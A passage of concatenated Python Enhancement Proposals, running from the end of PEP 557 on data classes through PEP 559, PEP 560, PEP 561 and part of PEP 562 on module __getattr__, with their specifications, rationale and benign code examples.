fields. If a library defines:
Time = namedtuple('Time', ['hour', 'minute'])
def get_time():
return Time(12, 0)
Then if a user uses this code as:
hour, minute = get_time()
then it would not be possible to add a second field to Time
without breaking the user’s code.
No option for mutable instances.
Cannot specify default values.
Cannot control which fields are used for __init__, __repr__,
etc.
Cannot support combining fields by inheritance.
Why not just use typing.NamedTuple?
For classes with statically defined fields, it does support similar
syntax to Data Classes, using type annotations. This produces a
namedtuple, so it shares namedtuple's benefits and some of its
downsides. Data Classes, unlike typing.NamedTuple, support
combining fields via inheritance.
Why not just use attrs?
attrs moves faster than could be accommodated if it were moved into
the standard library.
attrs supports additional features not being proposed here:
validators, converters, metadata, etc. Data Classes makes a
tradeoff to achieve simplicity by not implementing these
features.
For more discussion, see [12].
post-init parameters
In an earlier version of this PEP before InitVar was added, the
post-init function __post_init__ never took any parameters.
The normal way of doing parameterized initialization (and not just
with Data Classes) is to provide an alternate classmethod constructor.
For example:
@dataclass
class C:
x: int
@classmethod
def from_file(cls, filename):
with open(filename) as fl:
file_value = int(fl.read())
return C(file_value)
c = C.from_file('file.txt')
Because the __post_init__ function is the last thing called in the
generated __init__, having a classmethod constructor (which can
also execute code immediately after constructing the object) is
functionally equivalent to being able to pass parameters to a
__post_init__ function.
With InitVars, __post_init__ functions can now take
parameters. They are passed first to __init__ which passes them
to __post_init__ where user code can use them as needed.
The only real difference between alternate classmethod constructors
and InitVar pseudo-fields is in regards to required non-field
parameters during object creation. With InitVars, when using
__init__ or the module-level replace() function, InitVars
must always be specified. Consider the case where a context
object is needed to create an instance, but isn’t stored as a field.
With alternate classmethod constructors the context parameter is
always optional, because you could still create the object by going
through __init__ (unless you suppress its creation). Which
approach is more appropriate will be application-specific, but both
approaches are supported.
Another reason for using InitVar fields is that the class author
can control the order of __init__ parameters. This is especially
important with regular fields and InitVar fields that have default
values, as all fields with defaults must come after all fields without
defaults. A previous design had all init-only fields coming after
regular fields. This meant that if any field had a default value,
then all init-only fields would have to have default values, too.
asdict and astuple function names
The names of the module-level helper functions asdict() and
astuple() are arguably not PEP 8 compliant, and should be
as_dict() and as_tuple(), respectively. However, after
discussion [13] it was decided to keep consistency with
namedtuple._asdict() and attr.asdict().
Rejected ideas
Copying init=False fields after new object creation in replace()
Fields that are init=False are by definition not passed to
__init__, but instead are initialized with a default value, or by
calling a default factory function in __init__, or by code in
__post_init__.
A previous version of this PEP specified that init=False fields
would be copied from the source object to the newly created object
after __init__ returned, but that was deemed to be inconsistent
with using __init__ and __post_init__ to initialize the new
object. For example, consider this case:
@dataclass
class Square:
length: float
area: float = field(init=False, default=0.0)
def __post_init__(self):
self.area = self.length * self.length
s1 = Square(1.0)
s2 = replace(s1, length=2.0)
If init=False fields were copied from the source to the
destination object after __post_init__ is run, then s2 would end
up being Square(length=2.0, area=1.0), instead of the correct
Square(length=2.0, area=4.0).
Automatically support mutable default values
One proposal was to automatically copy defaults, so that if a literal
list [] was a default value, each instance would get a new list.
There were undesirable side effects of this decision, so the final
decision is to disallow the 3 known built-in mutable types: list,
dict, and set. For a complete discussion of this and other options,
see [14].
Examples
Custom __init__ method
Sometimes the generated __init__ method does not suffice. For
example, suppose you wanted to have an object to store *args and
**kwargs:
@dataclass(init=False)
class ArgHolder:
args: List[Any]
kwargs: Mapping[Any, Any]
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
a = ArgHolder(1, 2, three=3)
A complicated example
This code exists in a closed source project:
class Application:
def __init__(self, name, requirements, constraints=None, path='', executable_links=None, executables_dir=()):
self.name = name
self.requirements = requirements
self.constraints = {} if constraints is None else constraints
self.path = path
self.executable_links = [] if executable_links is None else executable_links
self.executables_dir = executables_dir
self.additional_items = []
def __repr__(self):
return f'Application({self.name!r},{self.requirements!r},{self.constraints!r},{self.path!r},{self.executable_links!r},{self.executables_dir!r},{self.additional_items!r})'
This can be replaced by:
@dataclass
class Application:
name: str
requirements: List[Requirement]
constraints: Dict[str, str] = field(default_factory=dict)
path: str = ''
executable_links: List[str] = field(default_factory=list)
executables_dir: Tuple[str] = ()
additional_items: List[str] = field(init=False, default_factory=list)
The Data Class version is more declarative, has less code, supports
typing, and includes the other generated functions.
Acknowledgements
The following people provided invaluable input during the development
of this PEP and code: Ivan Levkivskyi, Guido van Rossum, Hynek
Schlawack, Raymond Hettinger, and Lisa Roach. I thank them for their
time and expertise.
A special mention must be made about the attrs project. It was a
true inspiration for this PEP, and I respect the design decisions they
made.
References
[1]
attrs project on github
(https://github.com/python-attrs/attrs)
[2]
George Sakkis’ recordType recipe
(http://code.activestate.com/recipes/576555-records/)
[3]
DictDotLookup recipe
(http://code.activestate.com/recipes/576586-dot-style-nested-lookups-over-dictionary-based-dat/)
[4]
attrdict package
(https://pypi.python.org/pypi/attrdict)
[5]
StackOverflow question about data container classes
(https://stackoverflow.com/questions/3357581/using-python-class-as-a-data-container)
[6]
David Beazley metaclass talk featuring data classes
(https://www.youtube.com/watch?v=sPiWg5jSoZI)
[7]
Python documentation for __hash__
(https://docs.python.org/3/reference/datamodel.html#object.__hash__)
[8]
ClassVar discussion in PEP 526
[9]
Start of python-ideas discussion
(https://mail.python.org/pipermail/python-ideas/2017-May/045618.html)
[10]
GitHub repo where discussions and initial development took place
(https://github.com/ericvsmith/dataclasses)
[11]
Support __slots__?
(https://github.com/ericvsmith/dataclasses/issues/28)
[12]
why not just attrs?
(https://github.com/ericvsmith/dataclasses/issues/19)
[13]
PEP 8 names for asdict and astuple
(https://github.com/ericvsmith/dataclasses/issues/110)
[14]
Copying mutable defaults
(https://github.com/ericvsmith/dataclasses/issues/3)
Copyright
This document has been placed in the public domain.
| Final | PEP 557 – Data Classes | Standards Track | This PEP describes an addition to the standard library called Data
Classes. Although they use a very different mechanism, Data Classes
can be thought of as “mutable namedtuples with defaults”. Because
Data Classes use normal class definition syntax, you are free to use
inheritance, metaclasses, docstrings, user-defined methods, class
factories, and other Python class features. |
PEP 559 – Built-in noop()
Author:
Barry Warsaw <barry at python.org>
Status:
Rejected
Type:
Standards Track
Created:
08-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Rejected alternatives
noop() returns something
References
Copyright
Abstract
This PEP proposes adding a new built-in function called noop() which does
nothing but return None.
Rationale
It is trivial to implement a no-op function in Python. It’s so easy in fact
that many people implement it over and over again. It would be useful in
many cases to have a common built-in function that does nothing.
One use case would be for PEP 553, where you could set the breakpoint
environment variable to the following in order to effectively disable it:
$ setenv PYTHONBREAKPOINT=noop
Implementation
The Python equivalent of the noop() function is exactly:
def noop(*args, **kws):
return None
The C built-in implementation is available as a pull request [1].
Rejected alternatives
noop() returns something
YAGNI.
This is rejected because it complicates the semantics. For example, if you
always return both *args and **kws, what do you return when none of
those are given? Returning a tuple of ((), {}) is kind of ugly, but
provides consistency. But you might also want to just return None since
that’s also conceptually what the function was passed.
Or, what if you pass in exactly one positional argument, e.g. noop(7). Do
you return 7 or ((7,), {})? And so on.
The author claims that you won’t ever need the return value of noop() so
it will always return None.
Coghlan’s Dialogs (edited for formatting):
My counterargument to this would be map(noop, iterable),
sorted(iterable, key=noop), etc. (filter, max, and
min all accept callables that accept a single argument, as do
many of the itertools operations).
Making noop() a useful default function in those cases just
needs the definition to be:
def noop(*args, **kwds):
return args[0] if args else None
The counterargument to the counterargument is that using None
as the default in all these cases is going to be faster, since it
lets the algorithm skip the callback entirely, rather than calling
it and having it do nothing useful.
References
[1]
https://github.com/python/cpython/pull/3480
Copyright
This document has been placed in the public domain.
| Rejected | PEP 559 – Built-in noop() | Standards Track | This PEP proposes adding a new built-in function called noop() which does
nothing but return None. |
PEP 560 – Core support for typing module and generic types
Author:
Ivan Levkivskyi <levkivskyi at gmail.com>
Status:
Final
Type:
Standards Track
Created:
03-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017, 14-Nov-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Performance
Metaclass conflicts
Hacks and bugs that will be removed by this proposal
Specification
__class_getitem__
__mro_entries__
Dynamic class creation and types.resolve_bases
Using __class_getitem__ in C extensions
Backwards compatibility and impact on users who don’t use typing
References
Copyright
Important
This PEP is a historical document. The up-to-date, canonical documentation can now be found at object.__class_getitem__() and
object.__mro_entries__().
See PEP 1 for how to propose changes.
Abstract
Initially PEP 484 was designed in such a way that it would not introduce
any changes to the core CPython interpreter. Now type hints and
the typing module are extensively used by the community, e.g. PEP 526
and PEP 557 extend the usage of type hints, and the backport of typing
on PyPI has 1M downloads/month. Therefore, this restriction can be removed.
It is proposed to add two special methods __class_getitem__ and
__mro_entries__ to the core CPython for better support of
generic types.
Rationale
The restriction to not modify the core CPython interpreter led to some
design decisions that became questionable when the typing module started
to be widely used. There are three main points of concern:
performance of the typing module, metaclass conflicts, and the large
number of hacks currently used in typing.
Performance
The typing module is one of the heaviest and slowest modules in
the standard library even with all the optimizations made. Mainly this is
because subscripted generic types (see PEP 484 for definition of terms used
in this PEP) are class objects (see also [1]). There are three main ways in which
the performance can be improved with the help of the proposed special methods:
Creation of generic classes is slow since the GenericMeta.__new__ is
very slow; we will not need it anymore.
Very long method resolution orders (MROs) for generic classes will be
half as long; they are present because we duplicate the collections.abc
inheritance chain in typing.
Instantiation of generic classes will be faster (this is minor however).
Metaclass conflicts
All generic types are instances of GenericMeta, so if a user uses
a custom metaclass, then it is hard to make a corresponding class generic.
This is particularly hard for library classes that a user doesn’t control.
A workaround is to always mix-in GenericMeta:
class AdHocMeta(GenericMeta, LibraryMeta):
pass
class UserClass(LibraryBase, Generic[T], metaclass=AdHocMeta):
...
but this is not always practical or even possible. With the help of the
proposed special attributes the GenericMeta metaclass will not be needed.
Hacks and bugs that will be removed by this proposal
_generic_new hack that exists because __init__ is not called on
instances with a type differing from the type whose __new__ was called,
C[int]().__class__ is C.
_next_in_mro speed hack will be not necessary since subscription will
not create new classes.
Ugly sys._getframe hack. This one is particularly nasty since it looks
like we can’t remove it without changes outside typing.
Currently generics do dangerous things with private ABC caches
to fix large memory consumption that grows at least as O(N²),
see [2]. This point is also important because it was recently proposed to
re-implement ABCMeta in C.
Problems with sharing attributes between subscripted generics,
see [3]. The current solution already uses __getattr__ and __setattr__,
but it is still incomplete, and solving this without the current proposal
will be hard and will need __getattribute__.
_no_slots_copy hack, where we clean up the class dictionary on every
subscription thus allowing generics with __slots__.
General complexity of the typing module. The new proposal will not
only allow removing the above-mentioned hacks/bugs, but also simplify
the implementation, so that it will be easier to maintain.
Specification
__class_getitem__
The idea of __class_getitem__ is simple: it is an exact analog of
__getitem__ with an exception that it is called on a class that
defines it, not on its instances. This allows us to avoid
GenericMeta.__getitem__ for things like Iterable[int].
The __class_getitem__ is automatically a class method and
does not require @classmethod decorator (similar to
__init_subclass__) and is inherited like normal attributes.
For example:
class MyList:
def __getitem__(self, index):
return index + 1
def __class_getitem__(cls, item):
return f"{cls.__name__}[{item.__name__}]"
class MyOtherList(MyList):
pass
assert MyList()[0] == 1
assert MyList[int] == "MyList[int]"
assert MyOtherList()[0] == 1
assert MyOtherList[int] == "MyOtherList[int]"
Note that this method is used as a fallback, so if a metaclass defines
__getitem__, then that will have the priority.
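For example (an illustrative sketch of the fallback behaviour):

class Meta(type):
    def __getitem__(cls, item):
        return "from metaclass"

class C(metaclass=Meta):
    def __class_getitem__(cls, item):
        return "from class_getitem"

assert C[int] == "from metaclass"    # the metaclass __getitem__ takes priority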
__mro_entries__
If an object that is not a class object appears in the tuple of bases of
a class definition, then method __mro_entries__ is searched on it.
If found, it is called with the original tuple of bases as an argument.
The result of the call must be a tuple, which is unpacked into the base classes
in place of this object. (If the tuple is empty, the original entry
is simply discarded.) If there is more than one object with
__mro_entries__, then all of them are called with the same original tuple
of bases. This step happens first in the process of creation of a class,
all other steps, including checks for duplicate bases and MRO calculation,
happen normally with the updated bases.
Using the method API instead of just an attribute is necessary to avoid
inconsistent MRO errors, and perform other manipulations that are currently
done by GenericMeta.__new__. The original bases are stored as
__orig_bases__ in the class namespace (currently this is also done by
the metaclass). For example:
class GenericAlias:
def __init__(self, origin, item):
self.origin = origin
self.item = item
def __mro_entries__(self, bases):
return (self.origin,)
class NewList:
def __class_getitem__(cls, item):
return GenericAlias(cls, item)
class Tokens(NewList[int]):
...
assert Tokens.__bases__ == (NewList,)
assert Tokens.__orig_bases__ == (NewList[int],)
assert Tokens.__mro__ == (Tokens, NewList, object)
Resolution using __mro_entries__ happens only in bases of a class
definition statement. In all other situations where a class object is
expected, no such resolution will happen; this includes the isinstance
and issubclass built-in functions.
NOTE: These two method names are reserved for use by the typing module
and the generic types machinery, and any other use is discouraged.
The reference implementation (with tests) can be found in [4], and
the proposal was originally posted and discussed on the typing tracker,
see [5].
Dynamic class creation and types.resolve_bases
type.__new__ will not perform any MRO entry resolution, so a direct
call type('Tokens', (List[int],), {}) will fail. This is done for
performance reasons and to minimize the number of implicit transformations.
Instead, a helper function resolve_bases will be added to
the types module to allow an explicit __mro_entries__ resolution in
the context of dynamic class creation. Correspondingly, types.new_class
will be updated to reflect the new class creation steps while maintaining
the backwards compatibility:
def new_class(name, bases=(), kwds=None, exec_body=None):
resolved_bases = resolve_bases(bases) # This step is added
meta, ns, kwds = prepare_class(name, resolved_bases, kwds)
if exec_body is not None:
exec_body(ns)
ns['__orig_bases__'] = bases # This step is added
return meta(name, resolved_bases, ns, **kwds)
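For illustration, a small usage sketch of the updated machinery (assuming the Python 3.7 behaviour described above):

import types
from typing import List

# type() performs no __mro_entries__ resolution:
#   type('Tokens', (List[int],), {})    # raises TypeError

Tokens = types.new_class('Tokens', (List[int],))
assert issubclass(Tokens, list)
assert Tokens.__orig_bases__ == (List[int],)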
Using __class_getitem__ in C extensions
As mentioned above, __class_getitem__ is automatically a class method
if defined in Python code. To define this method in a C extension, one
should use flags METH_O|METH_CLASS. For example, a simple way to make
an extension class generic is to use a method that simply returns the
original class objects, thus fully erasing the type information at runtime,
and deferring all checks to static type checkers only:
typedef struct {
PyObject_HEAD
/* ... your code ... */
} SimpleGeneric;
static PyObject *
simple_class_getitem(PyObject *type, PyObject *item)
{
Py_INCREF(type);
return type;
}
static PyMethodDef simple_generic_methods[] = {
{"__class_getitem__", simple_class_getitem, METH_O|METH_CLASS, NULL},
/* ... other methods ... */
};
PyTypeObject SimpleGeneric_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"SimpleGeneric",
sizeof(SimpleGeneric),
0,
.tp_flags = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE,
.tp_methods = simple_generic_methods,
};
Such a class can be used as a normal generic in Python type annotations
(a corresponding stub file should be provided for static type checkers,
see PEP 484 for details):
from simple_extension import SimpleGeneric
from typing import TypeVar
T = TypeVar('T')
Alias = SimpleGeneric[str, T]
class SubClass(SimpleGeneric[T, int]):
...
data: Alias[int] # Works at runtime
more_data: SubClass[str] # Also works at runtime
Backwards compatibility and impact on users who don’t use typing
This proposal may break code that currently uses the names
__class_getitem__ and __mro_entries__. (But the language
reference explicitly reserves all undocumented dunder names, and
allows “breakage without warning”; see [6].)
This proposal will support almost complete backwards compatibility with
the current public generic types API; moreover the typing module is still
provisional. The only two exceptions are that currently
issubclass(List[int], List) returns True, while with this proposal it will
raise TypeError, and repr() of unsubscripted user-defined generics
cannot be tweaked and will coincide with repr() of normal (non-generic)
classes.
With the reference implementation I measured negligible performance effects
(under 1% on a micro-benchmark) for regular (non-generic) classes. At the same
time performance of generics is significantly improved:
importlib.reload(typing) is up to 7x faster
Creation of user defined generic classes is up to 4x faster (on a
micro-benchmark with an empty body)
Instantiation of generic classes is up to 5x faster (on a micro-benchmark
with an empty __init__)
Other operations with generic types and instances (like method lookup and
isinstance() checks) are improved by around 10-20%
The only aspect that gets slower with the current proof of concept
implementation is the subscripted generics cache look-up. However, it was
already very efficient, so this aspect has a negligible overall impact.
References
[1]
Discussion following Mark Shannon’s presentation at Language Summit
(https://github.com/python/typing/issues/432)
[2]
Pull Request to implement shared generic ABC caches (merged)
(https://github.com/python/typing/pull/383)
[3]
An old bug with setting/accessing attributes on generic types
(https://github.com/python/typing/issues/392)
[4]
The reference implementation
(https://github.com/ilevkivskyi/cpython/pull/2/files,
https://github.com/ilevkivskyi/cpython/tree/new-typing)
[5]
Original proposal
(https://github.com/python/typing/issues/468)
[6]
Reserved classes of identifiers
(https://docs.python.org/3/reference/lexical_analysis.html#reserved-classes-of-identifiers)
Copyright
This document has been placed in the public domain.
| Final | PEP 560 – Core support for typing module and generic types | Standards Track | Initially PEP 484 was designed in such way that it would not introduce
any changes to the core CPython interpreter. Now type hints and
the typing module are extensively used by the community, e.g. PEP 526
and PEP 557 extend the usage of type hints, and the backport of typing
on PyPI has 1M downloads/month. Therefore, this restriction can be removed.
It is proposed to add two special methods __class_getitem__ and
__mro_entries__ to the core CPython for better support of
generic types. |
PEP 561 – Distributing and Packaging Type Information
Author:
Ethan Smith <ethan at ethanhs.me>
Status:
Final
Type:
Standards Track
Topic:
Packaging, Typing
Created:
09-Sep-2017
Python-Version:
3.7
Post-History:
10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018
Table of Contents
Abstract
Rationale
Definition of Terms
Specification
Packaging Type Information
Stub-only Packages
Type Checker Module Resolution Order
Partial Stub Packages
Implementation
Acknowledgements
Version History
References
Copyright
Abstract
PEP 484 introduced type hinting to Python, with goals of making typing
gradual and easy to adopt. Currently, typing information must be distributed
manually. This PEP provides a standardized means to leverage existing tooling
to package and distribute type information with minimal work and an ordering
for type checkers to resolve modules and collect this information for type
checking.
Rationale
Currently, package authors wish to distribute code that has inline type
information. Additionally, maintainers would like to distribute stub files
to keep Python 2 compatibility while using newer annotation syntax. However,
there is no standard method to distribute packages with type information.
Also, if one wished to ship stub files privately the only method available
would be via setting MYPYPATH or the equivalent to manually point to
stubs. If the package can be released publicly, it can be added to
typeshed [1]. However, this does not scale and becomes a burden on the
maintainers of typeshed. In addition, it ties bug fixes in stubs to releases
of the tool using typeshed.
PEP 484 has a brief section on distributing typing information. In this
section
the PEP recommends using shared/typehints/pythonX.Y/ for
shipping stub files. However, manually adding a path to stub files for each
third party library does not scale. The simplest approach people have taken
is to add site-packages to their MYPYPATH, but this causes type
checkers to fail on packages that are highly dynamic (e.g. sqlalchemy
and Django).
Definition of Terms
The definitions of “MAY”, “MUST”, “SHOULD”, and “SHOULD NOT” are
to be interpreted as described in RFC 2119.
“inline” - the types are part of the runtime code using PEP 526 and
PEP 3107 syntax (the filename ends in .py).
“stubs” - files containing only type information, empty of runtime code
(the filename ends in .pyi).
“Distributions” are the packaged files which are used to publish and distribute
a release. (PEP 426)
“Module” - a file containing Python runtime code or stubbed type information.
“Package” - a directory or directories that namespace Python modules.
(Note the distinction between packages and distributions. While most
distributions are named after the one package they install, some
distributions install multiple packages.)
Specification
There are several motivations and methods of supporting typing in a package.
This PEP recognizes three types of packages that users of typing wish to
create:
The package maintainer would like to add type information inline.
The package maintainer would like to add type information via stubs.
A third party or package maintainer would like to share stub files for
a package, but the maintainer does not want to include them in the source
of the package.
This PEP aims to support all three scenarios and make them simple to add to
packaging and deployment.
The two major parts of this specification are the packaging specifications
and the resolution order for resolving module type information. The type
checking spec is meant to replace the shared/typehints/pythonX.Y/
spec of PEP 484.
New third party stub libraries SHOULD distribute stubs via the third party
packaging methods proposed in this PEP in place of being added to typeshed.
Typeshed will remain in use, but if maintainers are found, third party stubs
in typeshed MAY be split into their own package.
Packaging Type Information
In order to make packaging and distributing type information as simple and
easy as possible, packaging and distribution is done through existing
frameworks.
Package maintainers who wish to support type checking of their code MUST add
a marker file named py.typed to their package supporting typing. This marker applies
recursively: if a top-level package includes it, all its sub-packages MUST support
type checking as well. To have this file installed with the package,
maintainers can use existing packaging options such as package_data in
distutils, shown below.
Distutils option example:
setup(
...,
package_data = {
'foopkg': ['py.typed'],
},
...,
)
For namespace packages (see PEP 420), the py.typed file should be in the
submodules of the namespace, to avoid conflicts and for clarity.
This PEP does not support distributing typing information as part of
module-only distributions or single-file modules within namespace packages.
The single-file module should be refactored into a package
and indicate that the package supports typing as described
above.
Stub-only Packages
For package maintainers wishing to ship stub files containing all of their
type information, it is preferred that the *.pyi stubs are alongside the
corresponding *.py files. However, the stubs can also be put in a separate
package and distributed separately. Third parties can also find this method
useful if they wish to distribute stub files. The name of the stub package
MUST follow the scheme foopkg-stubs for type stubs for the package named
foopkg. Note that for stub-only packages adding a py.typed marker is not
needed since the name *-stubs is enough to indicate it is a source of typing
information.
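For illustration, a stub-only distribution for a hypothetical package
foopkg could install a single package laid out as follows (the module
names are made up):
foopkg-stubs
├── __init__.pyi
└── helpers.pyi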
Third parties seeking to distribute stub files are encouraged to contact the
maintainer of the package about distribution alongside the package. If the
maintainer does not wish to maintain or package stub files or type information
inline, then a third party stub-only package can be created.
In addition, stub-only distributions SHOULD indicate which version(s)
of the runtime package are supported by indicating the runtime distribution’s
version(s) through normal dependency data. For example, the
stub package flyingcircus-stubs can indicate the versions of the
runtime flyingcircus distribution it supports through install_requires
in distutils-based tools, or the equivalent in other packaging tools. Note
that in pip 9.0, updating flyingcircus-stubs will also upgrade
flyingcircus unless the --upgrade-strategy=only-if-needed flag is
passed; in pip 10.0 this is the default behavior.
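A hedged sketch of such a stub-only distribution's setup.py (the version
constraint and file names are illustrative only):
from setuptools import setup

setup(
    name='flyingcircus-stubs',
    version='1.0',
    packages=['flyingcircus-stubs'],
    package_data={'flyingcircus-stubs': ['*.pyi']},
    # Declare which runtime versions these stubs describe:
    install_requires=['flyingcircus>=2.0,<3.0'],
)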
For namespace packages (see PEP 420), stub-only packages should
use the -stubs suffix on only the root namespace package.
All stub-only namespace packages should omit __init__.pyi files. py.typed
marker files are not necessary for stub-only packages, but similarly
to packages with inline types, if used, they should be in submodules of the namespace to
avoid conflicts and for clarity.
For example, if the pentagon and hexagon are separate distributions
installing within the namespace package shapes.polygons, the
corresponding types-only distributions should produce packages
laid out as follows:
shapes-stubs
└── polygons
└── pentagon
└── __init__.pyi
shapes-stubs
└── polygons
└── hexagon
└── __init__.pyi
Type Checker Module Resolution Order
The following is the order in which type checkers supporting this PEP SHOULD
resolve modules containing type information:
1. Stubs or Python source manually put in the beginning of the path. Type
   checkers SHOULD provide this to allow the user complete control of which
   stubs to use, and to patch broken stubs/inline types from packages.
   In mypy the $MYPYPATH environment variable can be used for this.
2. User code - the files the type checker is running on.
3. Stub packages - these packages SHOULD supersede any installed inline
   package. They can be found at foopkg-stubs for package foopkg.
4. Packages with a py.typed marker file - if there is nothing overriding
   the installed package, and it opts into type checking, the types
   bundled with the package SHOULD be used (be they in .pyi type
   stub files or inline in .py files).
5. Typeshed (if used) - Provides the stdlib types and several third party
   libraries.
If typecheckers identify a stub-only namespace package without the desired module
in step 3, they should continue to step 4/5. Typecheckers should identify namespace packages
by the absence of __init__.pyi. This allows different subpackages to
independently opt for inline vs stub-only.
Type checkers that check a different Python version than the version they run
on MUST find the type information in the site-packages/dist-packages
of that Python version. This can be queried with, e.g.,
pythonX.Y -c 'import site; print(site.getsitepackages())'. It is also recommended
that the type checker allow for the user to point to a particular Python
binary, in case it is not in the path.
Partial Stub Packages
Many stub packages will only have part of the type interface for libraries
completed, especially initially. For the benefit of type checking and code
editors, packages can be “partial”. This means modules not found in the stub
package SHOULD be searched for in parts four and five of the module resolution
order above, namely inline packages and typeshed.
Type checkers should merge the stub package and runtime package or typeshed
directories. This can be thought of as the functional equivalent of copying the
stub package into the same directory as the corresponding runtime package or
typeshed folder and type checking the combined directory structure. Thus type
checkers MUST maintain the normal resolution order of checking *.pyi before
*.py files.
If a stub package distribution is partial it MUST include partial\n in a
py.typed file. For stub-packages distributing within a namespace
package (see PEP 420), the py.typed file should be in the
submodules of the namespace.
Type checkers should treat namespace packages within stub-packages as
incomplete since multiple distributions may populate them.
Regular packages within namespace packages in stub-package distributions
are considered complete unless a py.typed with partial\n is included.
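For illustration, a hedged one-liner that marks the hypothetical
foopkg-stubs package as partial by writing the required marker content:
from pathlib import Path

Path("foopkg-stubs/py.typed").write_text("partial\n")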
Implementation
The proposed scheme of indicating support for typing is completely backwards
compatible, and requires no modification to package tooling. A sample package
with inline types is available [typed_package], as well as a [stub_package].
There is also a sample package checker [pkg_checker], which reads the metadata
of installed packages and reports on their status as either not typed, inline
typed, or a stub package.
The mypy type checker has an implementation of PEP 561 module searching,
which is described in the mypy docs [4].
[numpy-stubs] is an example of a real stub-only package for the numpy
distribution.
Acknowledgements
This PEP would not have been possible without the ideas, feedback, and support
of Ivan Levkivskyi, Jelle Zijlstra, Alyssa Coghlan, Daniel F Moisset, Andrey
Vlasovskikh, Nathaniel Smith, and Guido van Rossum.
Version History
2023-01-13
Clarify that the 4th step of the Module Resolution Order applies
to any package with a py.typed marker file (and not just
inline packages).
2021-09-20
Clarify expectations and typechecker behavior for stub-only namespace packages
Clarify handling of single-file modules within namespace packages.
2018-07-09
Add links to sample stub-only packages
2018-06-19
Partial stub packages can look at typeshed as well as runtime packages
2018-05-15
Add partial stub package spec.
2018-04-09
Add reference to mypy implementation
Clarify stub package priority.
2018-02-02
Change stub-only package suffix to be -stubs not _stubs.
Note that py.typed is not needed for stub-only packages.
Add note about pip and upgrading stub packages.
2017-11-12
Rewritten to use existing tooling only
No need to indicate kind of type information in metadata
Name of marker file changed from .typeinfo to py.typed
2017-11-10
Specification re-written to use package metadata instead of distribution
metadata.
Removed stub-only packages and merged into third party packages spec.
Removed suggestion for typecheckers to consider checking runtime versions
Implementations updated to reflect PEP changes.
2017-10-26
Added implementation references.
Added acknowledgements and version history.
2017-10-06
Rewritten to use .distinfo/METADATA over a distutils specific command.
Clarify versioning of third party stub packages.
2017-09-11
Added information about current solutions and typeshed.
Clarify rationale.
References
[1]
Typeshed (https://github.com/python/typeshed)
[4]
Example implementation in a type checker
(https://mypy.readthedocs.io/en/latest/installed_packages.html)
[stub_package]
A stub-only package
(https://github.com/ethanhs/stub-package)
[typed_package]
Sample typed package
(https://github.com/ethanhs/sample-typed-package)
[numpy-stubs]
Stubs for numpy
(https://github.com/numpy/numpy-stubs)
[pkg_checker]
Sample package checker
(https://github.com/ethanhs/check_typedpkg)
Copyright
This document has been placed in the public domain.
| Final | PEP 561 – Distributing and Packaging Type Information | Standards Track | PEP 484 introduced type hinting to Python, with goals of making typing
gradual and easy to adopt. Currently, typing information must be distributed
manually. This PEP provides a standardized means to leverage existing tooling
to package and distribute type information with minimal work and an ordering
for type checkers to resolve modules and collect this information for type
checking. |
PEP 562 – Module __getattr__ and __dir__
Author:
Ivan Levkivskyi <levkivskyi at gmail.com>
Status:
Final
Type:
Standards Track
Created:
09-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Specification
Backwards compatibility and impact on performance
Discussion
References
Copyright
Abstract
It is proposed to support __getattr__ and __dir__ functions defined
on modules to provide basic customization of module attribute access.
Rationale
It is sometimes convenient to customize or otherwise have control over
access to module attributes. A typical example is managing deprecation
warnings. Typical workarounds are assigning __class__ of a module object
to a custom subclass of types.ModuleType or replacing the sys.modules
item with a custom wrapper instance. It would be convenient to simplify this
procedure by recognizing __getattr__ defined directly in a module that
would act like a normal __getattr__ method, except that it will be defined
on module instances. For example:
# lib.py
from warnings import warn
deprecated_names = ["old_function", ...]
def _deprecated_old_function(arg, other):
...
def __getattr__(name):
if name in deprecated_names:
warn(f"{name} is deprecated", DeprecationWarning)
return globals()[f"_deprecated_{name}"]
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
# main.py
from lib import old_function # Works, but emits the warning
Another widespread use case for __getattr__ would be lazy submodule
imports. Consider a simple example:
# lib/__init__.py
import importlib
__all__ = ['submod', ...]
def __getattr__(name):
if name in __all__:
return importlib.import_module("." + name, __name__)
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
# lib/submod.py
print("Submodule loaded")
class HeavyClass:
...
# main.py
import lib
lib.submod.HeavyClass # prints "Submodule loaded"
There is a related proposal PEP 549 that proposes to support instance
properties for a similar functionality. The difference is this PEP proposes
a faster and simpler mechanism, but provides more basic customization.
An additional motivation for this proposal is that PEP 484 already defines
the use of module __getattr__ for this purpose in Python stub files,
see PEP 484.
In addition, to allow modifying the result of a dir() call on a module
to show deprecated and other dynamically generated attributes, it is
proposed to support a module level __dir__ function. For example:
# lib.py
deprecated_names = ["old_function", ...]
__all__ = ["new_function_one", "new_function_two", ...]
def new_function_one(arg, other):
...
def new_function_two(arg, other):
...
def __dir__():
return sorted(__all__ + deprecated_names)
# main.py
import lib
dir(lib) # prints ["new_function_one", "new_function_two", "old_function", ...]
Specification
The __getattr__ function at the module level should accept one argument
which is the name of an attribute and return the computed value or raise
an AttributeError:
def __getattr__(name: str) -> Any: ...
If an attribute is not found on a module object through the normal lookup
(i.e. object.__getattribute__), then __getattr__ is searched in
the module __dict__ before raising an AttributeError. If found, it is
called with the attribute name and the result is returned. Looking up a name
as a module global will bypass module __getattr__. This is intentional,
otherwise calling __getattr__ for builtins will significantly harm
performance.
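The lookup can be approximated by the following Python-level sketch; this
is illustrative only (the actual implementation lives in C), and the helper
name is made up:
def module_getattr(mod, name):
    try:
        # Normal attribute lookup (module __dict__, type attributes, ...).
        return object.__getattribute__(mod, name)
    except AttributeError:
        hook = mod.__dict__.get('__getattr__')
        if hook is None:
            raise
        # Fall back to the module-level __getattr__, if defined.
        return hook(name)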
The __dir__ function should accept no arguments, and return
a list of strings that represents the names accessible on the module:
def __dir__() -> List[str]: ...
If present, this function overrides the standard dir() search on
a module.
The reference implementation for this PEP can be found in [2].
Backwards compatibility and impact on performance
This PEP may break code that uses module level (global) names __getattr__
and __dir__. (But the language reference explicitly reserves all
